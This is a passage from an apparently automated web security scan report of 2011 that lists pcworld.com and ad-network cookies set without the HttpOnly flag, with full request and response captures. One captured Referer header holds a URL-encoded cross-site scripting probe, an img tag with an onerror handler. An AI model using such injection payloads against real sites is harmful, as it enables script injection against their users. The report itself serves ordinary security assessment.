Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; fsr.a=1305206909000

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:42 GMT
Server: Apache
X-GasHost: gas2
X-Cooking-With: Gasoline-Proxy
X-GasOriginRetry: 0
X-GasOriginTime: 0
Content-Type: text/xml;charset=UTF-8
Set-Cookie: JSESSIONID=80DBBED07FC79248F35F09EBE06EE533; Path=/
Vary: Accept-Encoding
Content-Length: 1765


<taconite>
   <hide select="#postingMessage" />
   <replaceContent select="#commentContainer">
   
   <ul id="commentList">
       
       <li class="item">
           <cite><a href="http://forums.pcworld.com/index.p
...[SNIP]...
9.7. http://www.pcworld.com/articleVote/get.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /articleVote/get.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /articleVote/get.do?aid=227430&style=default HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; fsr.a=1305206907999

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:38 GMT
Server: Apache
X-GasHost: gas3
X-Cooking-With: Gasoline-Proxy
X-GasOriginRetry: 0
X-GasOriginTime: 0
Content-Type: text/xml;charset=UTF-8
Set-Cookie: JSESSIONID=F31153C2009EAEEEC7EC8D5B9DD688F2; Path=/
Vary: Accept-Encoding
Content-Length: 212


<taconite>
   
   <replaceContent select="#voteTallyYes">27</replaceContent>
   <replaceContent select="#voteTallyNo">1</replaceContent>
   <replaceContent select="#voteYesBottom">27</replaceContent>
<
...[SNIP]...
9.8. http://www.pcworld.com/pcworldconnect/a  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /pcworldconnect/a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pcworldconnect/a HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/pcworldconnect/comment_registration?callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html125d0%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E0753613c8b936b7cc
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmc=205278865; __utmb=205278865; pcw.last_uri=/blogs/id%2C61/bizfeed.html; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.s={"v":1,"rid":"1305207028351_313644","ru":"http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html","r":"www.pcworld.com","st":"","to":3,"c":"http://www.pcworld.com/blogs/id,61/bizfeed.html","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; JSESSIONID=37DBA5BF4885B3CA496B7FAFE45B1DC7

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 13:34:16 GMT
Server: Apache
X-GasHost: gas2
X-Cooking-With: Gasoline-Proxy
X-GasOriginRetry: 0
X-GasOriginTime: 0
Content-Type: text/html
Set-Cookie: JSESSIONID=19BC2B8DD4812239B8000851DD33F530; Path=/
Vary: Accept-Encoding
Content-Length: 4215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
9.9. http://www.pcworld.com/pcworldconnect/comment_registration  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /pcworldconnect/comment_registration HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 111

callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A582A284CD97C03D88D1B381CBB00A78; Path=/
Vary: Accept-Encoding
Content-Length: 6223


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
9.10. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:35 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-33-35_10260675261305207215; expires=Tue, 10-May-2016 13:33:35 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_10260675261305207215; expires=Thu, 12-May-2011 13:48:35 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
9.11. http://a.tribalfusion.com/displayAd.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.3&th=22201705828 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=atnqu6riIfG8BIYQi6b2JpHNWw7ip4NZdMPogw5vkkBn0T3HQtWowoRsSYTvmJjwm2SMTGwMWJBZdTM0WowKoZd3ZdtDgvWRTSxb51PnuxdHM8eiSL9lvR1WtoaiLWSfwZcxgXSKCG9Y0Kw3HbErnPOAcmmyZb9BdGZdLFCrZdtc2SlpZaQShRDVibPiyAZaHXnbFSWKqW2c9GHZcgZb1bfrQPOZc79iGEIAeZaKxuMesjBpjPhIW3jZdrZcZb57ZdwUyA3f8oft8bsQqHxZditEHY8Go6loyEyd6emb2KgVMDZaSROVL7jrIBLwOW0FePwSPOb9iFBayK9baZdItGffDeBcdrAJQAF8dDr6N9I1xsdcyeNohe6WxZaIeRvUOtnZaJEEQcLbaOZdiwniS9EvhZbSyZaZcghUZcgGbxqDNf5ngoUqMWEeiM5noywW24WcjDVuHPkkvlXJGyMC4TrsZbMUcq6Zd53IcMK3gQuZcGZd6MSh6vQbNHIbZaZb2ZdJZaQv6KiLRhYvKaVZcZbioaEgxIR13pqA9J2f7gDe6dG6pyeZdxZcT8lgw9sLCpLcHkU1hDpZcssu1YmlDt8gSFUwgZbWaEOGxjvFFlA79d95Zakwg6PhCavDD6gwlnZaLR69xjHI8TcVXBKDdW65qTsgoRqDMCIVuKDh3ZaO97l3AvagYgdC2bIYMtxq4ZcZdZar98q61x0ZbgFGbyxK8OZbn09FGJCZbD3CjTlFZcpOh2bQvFKLlj7Ndy6eftkfphKgZbNhB137F7Yki4flK

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Thu, 12 May 2011 13:29:46 GMT
Last-Modified: Sun, 08 May 2011 10:17:40 GMT
Expires: Wed, 10 Aug 2011 13:29:46 GMT
Set-Cookie: ANON_ID=a1nqm7MwTmfSZatQmnFagc0XlhnLyH4bI8nZa7IRPWr8BFn2pJBlu031Wvv7XyJPu60syTWgSvuQue5bZbhh5imWAQpFpts5USfTR9F2NQ1FZdl3ClkEghZaEJyVBZcro32AqvYrLX1h61jHZc3nvZcZdj6AXfJZccZavZaDPxqCZdhQjW7D235l25ZdgrXEAZaGTfxsV6EX6tc99X7tMTovbNErYkXsCDf4drTi5IvRHOBKjPKyhhmx6QSBBRpZcFAZdHAwgD5tpjq02SOT0Zd051F09IqspXQnesfZa61EplM2oZcxiUFfI12WRYiTjQNpiluxaZdPl0EWoJbLQSiuyJZcuv6NVsBdT3fm7KoJqN6lBClgXAo11eYOqD3vwBjvs4WDbexxNtBy2wXoVZb3XEqYZdc4NCqqMnZbTwLP4V2F9re2tZb7D4qG2Px9QfL6hF7WUrMX7fiVQMrueBcyO1KLSUtDPiJc8aKjZa8myH0yGqcaUaF4xBZdKyLSrJExUKacMNB9mZbAY6xiancxnLeejw3GpWUyZaVe3Ejer8CQx43nrcfOCZdYAKS3037PgMrteZcbNg3Kea4gt3OkKoVc09Za9AFMgGej8oIq1JZaeBSttifn3O1480LT6nx2nNGxa6Md6MF67YRlZdxE7p1WY9iNjt8OpwjFRbMnU64M2EUcUmM4jy9hlKThdOJtRj25o4IeMxkJ2Ngxh7DZdamYWOZd1FwdACEwPDXpRgQcIDdbTaukZaeO1Co7GpZbHdY0eTL; path=/; domain=.tribalfusion.com; expires=Wed, 10-Aug-2011 13:29:46 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 60

var e9;
if (e9.displayAdFlag == true) {
e9.displayAd();
}
9.12. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=crenkcom&adSpace=ros&tagKey=2218970080&th=22201705828&tKey=undefined&size=300x250&p=6869973&a=2&flashVer=10&ver=1.20&center=1&addBlockingCategories=Survey|Pop-up|Pop-under|Expandable|Audio|Full-page|Floating|Warning&url=http%3A%2F%2Fcrenk.com%2Fbuy-chromebook%2F&f=0&rnd=6884586 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aCntPLO5nZclSE04SQm2X4By88RFFAT03pBuZddHX9UZaZbxujf7rOoybSWIIlj9T71qT7HTFCxEn5rmJjQGIweoYhL7ZcIC46GpoZb0xIxTAFPOWMv0yjjT0DfRmBx7FCOQANcUZcfGgPWejOqO0SAI54ZctxfPcR8iJyjyRw0jNxklmN9DO56PeZbtgSyke8ifZbyolE1wKvZblCmj877varrWIm6OOUmuodrNpbOcEkcvh4HWyZaEVgfD1ei9kXF2kKvKiZbujrlTWZaikFfA7FlrsR5pPLZaGIr3cm7eIMeEDHSj1eGQqHYmZagwfQZcIdZchkGiiZcp9VxgZcRdcnD4lAQe5WW3Bw0USJUuuNpkjXF689ZdpEO3YoXOZaBXZbpx79scc0Zb4LFDeBaA7EZc5HLLeGu23sria8EtmpTUy0x5RC7cZc05samZcaxJcsisCbtj0gg2AcVvfZc88q7pDQTfJ0OCIWLj54FOnLEOpFIZdsSTZd9xmDBdvpDXTEIfulbw4opYeACDD6UU657PNkKoIXNw8IJxPeHv63Ds7Zd7B9eo3uwhvNphv7oNYZbPwgHsuATcxmmd5IGFR4Tmew9woN2MJFE9XW26MABjFeYQu0HPWCfgpJfynY8tCX6XDm7mfBB1fZcnAK2qm4JmbW2SOjtT3uQx2VDtlabL28jFVdLsAB9ZcZbI9uJdvgEavoeH6W29PxmyLyyeN5LtYsvIoI5Cy2AoqNIG0DOPsdbshQZaU0j5Uf86QlDd0HxEZdsALr7okDZdJw2kr9N4dIUcuntgfaYcsquI6y

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnteZaRkPN7RyK3AbHMZasF4sP2KljaU43iokocYcZanZaffVfSqVtMFK2IERIZdlS1sxiMGfTECMgE2MA4bLecZcZbesHT1ky6f5n3qpIDfZbnvvVv7VofnZasAYbp9lI784xl4ZcZb6YKwssIJrU5Y2dMSTfx6ZbPNGdZdy49kwUVOZcbZclLbjAhBa6BwnySEfw88clIkZcTwmJp2GabLvbb7oKoGP8UQu131I7ZdhbuEvexVkZcw8lLNsbBUca1Zc0vfnQ6vZdZcV5fa84hJs7LQfxweiawgxBM88rvhvTU6Zcp94EG20YR6D7oPPZdxh1BU8pyAjXvtDaDrvJsVPrGTZaxdwXv9b25uoZdZbX7B9lmVGW8i4PtbTZaF2ZaMs2ZcHXDB6rl2AsBvkZd1tVPdoiZdZdOlDUNXauxqk4WYYyP8m5Eq0pbNpWMDNNdOrdIvygS3ZaSwGFR0Xm2MgbDZbdy9YY5amRCUuT5WHhhwjomrWFsqtL6V3qHQjO27gRRIsVoZd1R8YbdNPCcvNbGGKiVZbgUWcguaiYPdZdAYoOaQCgCOYUDpC1a0pJKE6UilOxa6cmPW1MEr83ZbqCDpZbKVkG1sdvmLBlf6LGPjUMBnKl2e0DE8JolffM5jFO7tgqwbjigs6qnZbZd5scTZdZc1Zc5yZc7ivc2Zb1aZdQp70J2kAvJchH4FwVIZb2UZdZbaoiRFn46qZdFj0ucy2I6RsPryvxeVPYsHv0bqfZd9s5D9OqOGcZcZd6l7AolO182aRZdMxtZboqORJXZdJA67lCBXg4Zd9LS8rGT9JK1RC6uH1Q5qFW2Ue; path=/; domain=.tribalfusion.com; expires=Wed, 10-Aug-2011 13:29:01 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 187

document.write('<iframe src="http://routenote.com/blog/TFadvertising/300.htm" width=300 height=250 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>');
9.13. http://a1.interclick.com/getInPageJSProcess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /getInPageJSProcess.aspx?a=54&b=9075&cid=284375483&isif=f&rurld=www.mysuburbanlife.com&sl=true&dvp=http%3A//www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th&rurl= HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734266&10654=734265; Aqprep_Banner300X250=128531=634405394911101145:12751&146741=634406189988691650:51941&146744=634406318831937511:51863; ucap=sl=1; FC_53=128532=17622465:1; IFC=n=1&w9075=1&a128532=1&e=634408759642542715; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825&128532=634407895642562717:9075; Li=1=734268&30=734245

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=1; domain=.a1.interclick.com; expires=Sun, 22-May-2011 13:34:40 GMT; path=/
Set-Cookie: FC_54=128530=17622465:1; domain=.a1.interclick.com; expires=Fri, 13-May-2011 13:34:40 GMT; path=/
Set-Cookie: IFC=n=2&w9075=2&a128532=1&e=634408759642542715&a128530=1; domain=.a1.interclick.com; expires=Fri, 13-May-2011 13:32:44 GMT; path=/
Set-Cookie: Aqprep_Banner160X600=128530=634407896800028452:9075; domain=.a1.interclick.com; expires=Wed, 10-Aug-2011 13:34:40 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 12 May 2011 13:34:39 GMT
Content-Length: 320

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.14%3Bsz%3D160x600%3Bclick%3Dhttp%3A//a1.interclick.com/i
...[SNIP]...
9.14. http://a1.interclick.com/getInPageJSProcess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /getInPageJSProcess.aspx?a=53&b=9075&cid=10856714&isif=f&rurld=www.mysuburbanlife.com&sl=true&dvp=http%3A//www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th&rurl= HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.mysuburbanlife.com/lyons/lifestyle/entertainment/x1539859994/To-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1305560188038&e50=1305834684416&e100=1305560187993; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734266&10654=734265; Li=1=734266&30=734245; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825&128532=634406189918725039:51745; ucap=sl=1; Aqprep_Banner300X250=128531=634405394911101145:12751&146741=634406189988691650:51941&146744=634406318831937511:51863

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=1; domain=.a1.interclick.com; expires=Sun, 22-May-2011 13:34:04 GMT; path=/
Set-Cookie: FC_53=128532=17622465:1; domain=.a1.interclick.com; expires=Fri, 13-May-2011 13:34:04 GMT; path=/
Set-Cookie: IFC=n=1&w9075=1&a128532=1&e=634408760448379734; domain=.a1.interclick.com; expires=Fri, 13-May-2011 13:34:04 GMT; path=/
Set-Cookie: Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825&128532=634407896448399736:9075; domain=.a1.interclick.com; expires=Wed, 10-Aug-2011 13:34:04 GMT; path=/
Set-Cookie: Li=1=734268&30=734245; domain=.a1.interclick.com; expires=Sat, 11-Jun-2011 13:34:04 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 12 May 2011 13:34:04 GMT
Content-Length: 319

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.13%3Bsz%3D728x90%3Bclick%3Dhttp%3A//a1.interclick.com/ic
...[SNIP]...
9.15. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /mm/rtb/COFC/1008A2/imp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mm/rtb/COFC/1008A2/imp?ci=&li=&pe=&pt=&pi=&sc=&ct=&vi=&px=&su= HTTP/1.1
Host: action.mathtag.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTQzOTk2NDY1MzI1NDQwMzEvMTE1MDAxLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHBmNzUtYWowd0pHOHN5dWFTWnc1Qm8v/eM1wOfWIxZ9RKD_2JFr8hJB1kM4&price=TcvhHwAGrxsK7Fqwx8QugpKAEgOl8KAu6D5byA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3GM9H-HLTZveGrC1sQeC3ZC-DNzvj_EBhpu-vBGs6YOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi0zNjI5OTM5MzY0Mzc1OTg0oAHg6pnsA7IBGnd3dy5taWxlaGlnaG9udGhlY2hlYXAuY29tugEKMTYweDYwMF9hc8gBCdoBYGh0dHA6Ly93d3cubWlsZWhpZ2hvbnRoZWNoZWFwLmNvbS8yMDExLzA1L25vLWZvb2xpbi1mcmVlLWNhdC1mcmlkYXktYWRvcHRpb24tc3BlY2lhbC1pbi1ib3VsZGVyL5gCxg_AAgTIAtbBjA6oAwHoA_MG6AO6KugD8gb1AwAAAMSABty1zYTyhKGTrwE%26num%3D1%26sig%3DAGiWqtxXQhDQNGr4Rg9Q9u2Yp7R_clKOjA%26client%3Dca-pub-3629939364375984%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1305129714; mt_mop=4:1305207074

Response

HTTP/1.1 200 OK
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x7846 30790
Content-Type: image/gif
